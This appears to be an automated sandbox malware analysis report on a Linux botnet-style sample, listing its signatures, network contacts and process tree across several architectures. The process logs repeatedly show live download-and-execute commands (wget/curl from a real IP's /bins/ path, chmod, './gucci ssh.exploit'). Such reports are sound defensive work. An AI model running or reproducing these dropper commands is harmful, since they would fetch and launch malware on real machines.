Malware Analysis Report

2024-10-24 21:20

Sample ID 240728-vkhpmateqn
Target 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118
SHA256 99bd7484ae2c892b3c45d7a60ab1a13495a7ef6a94c2a59240f32ee2faf938ac
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

99bd7484ae2c892b3c45d7a60ab1a13495a7ef6a94c2a59240f32ee2faf938ac

Threat Level: Shows suspicious behavior

The file 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-28 17:02

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-28 17:02

Reported

2024-07-29 10:56

Platform

debian9-mipsbe-20240729-en

Max time kernel

10s

Max time network

9s

Command Line

[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/gucci /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 N/A

Processes

/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118

[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm5]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm6]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm7]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/m68k]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/mips]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/mpsl]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/ppc]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/sh4]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/spc]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/x86]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-c7d802c3e63a4510b519298769069f5b-systemd-timedated.service-jiMssy]

/tmp/gucci

[./gucci ssh.exploit]

Network

Country Destination Domain Proto
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-28 17:02

Reported

2024-07-29 11:10

Platform

debian9-mipsel-20240729-en

Max time kernel

10s

Max time network

11s

Command Line

[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/gucci /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 N/A

Processes

/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118

[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm5]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm6]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm7]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/m68k]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/mips]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/mpsl]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/ppc]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/sh4]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/spc]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/x86]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-819d5c3ad7eb4daf80a8012e11071e4a-systemd-timedated.service-FDJJaY]

/tmp/gucci

[./gucci ssh.exploit]

Network

Country Destination Domain Proto
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-28 17:02

Reported

2024-07-29 11:23

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

2s

Max time network

128s

Command Line

[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/gucci /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 N/A

Processes

/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118

[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm5]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm6]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm7]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/m68k]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/mips]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/mpsl]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/ppc]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/sh4]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/spc]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/x86]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 config-err-Z2iRmj gucci netplan_rmicsxkz snap-private-tmp ssh-fM0WPAM8rKdw systemd-private-20cc4649210b49a4bb7be6d1097bb61c-bolt.service-R4fkcx systemd-private-20cc4649210b49a4bb7be6d1097bb61c-colord.service-VTiSeD systemd-private-20cc4649210b49a4bb7be6d1097bb61c-ModemManager.service-bxgrMV systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-resolved.service-5lDpv9 systemd-private-20cc4649210b49a4bb7be6d1097bb61c-systemd-timedated.service-z09Pm6]

/tmp/gucci

[./gucci ssh.exploit]

Network

Country Destination Domain Proto
US 192.3.122.100:80 tcp
N/A 224.0.0.251:5353 udp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.65.91:443 tcp
US 151.101.65.91:443 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
US 192.3.122.100:80 tcp
GB 84.17.50.9:443 tcp
US 192.3.122.100:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-28 17:02

Reported

2024-07-29 10:38

Platform

debian9-armhf-20240729-en

Max time kernel

20s

Max time network

21s

Command Line

[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A
N/A /tmp/gucci /tmp/gucci N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/gucci /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 N/A

Processes

/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118

[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm]

/usr/bin/curl

[curl -O http://192.3.122.100/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]

/tmp/gucci

[./gucci ssh.exploit]

/usr/bin/wget

[wget http://192.3.122.100/bins/arm5]

